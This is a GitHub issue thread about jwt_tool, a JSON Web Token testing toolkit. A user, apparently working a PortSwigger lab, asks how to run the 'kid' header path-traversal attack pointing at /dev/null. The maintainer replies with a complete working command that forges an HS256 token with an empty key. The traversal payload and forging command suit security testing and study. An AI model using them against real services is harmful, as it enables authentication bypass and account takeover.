Is jwt_tool support /dev/null attack?

ticarpi / jwt_tool

:snake: A toolkit for testing, tweaking and cracking JSON Web Tokens

GNU General Public License v3.0

5.46k stars 670 forks source link

Is jwt_tool support /dev/null attack? #71

Open re4sonzy opened 2 years ago

re4sonzy commented 2 years ago

PS C:\Users\WhoAmI\Desktop> python3 $jwt_tool eyJraWQiOiJlYThmNjRjNi1hM2VmLTRiZDctOWRmYi1iNjM0YmRkZjViMmIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NTM4NDY1NX0.MCxsDgrmR5GDgncc7o0hh1eM5jcnzOnl7eKPoCiZ6Yc -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""
usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np]
                   [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM]
                   [-pc PAYLOADCLAIM] [-hv HEADERVALUE] [-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE]
                   [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]
                   [jwt]
jwt_tool.py: error: argument -p/--password: expected one argument

righettod commented 2 years ago

Hi,

I add some context for this request based on the token content 😃

Source: https://portswigger.net/web-security/jwt

re4sonzy commented 2 years ago

Hi, can you make -p accept "" ?

ticarpi commented 2 years ago

The tool does accept a blank password with -p "" Or you can use the "blank password" exploit mode with -X b The same command works for me when substituting the jwt_tool.py binary name: python3 jwt_tool.py eyJraWQiOiJlYThmNjRjNi1hM2VmLTRiZDctOWRmYi1iNjM0YmRkZjViMmIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NTM4NDY1NX0.MCxsDgrmR5GDgncc7o0hh1eM5jcnzOnl7eKPoCiZ6Yc -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p "" What does $jwt_tool map to on your system?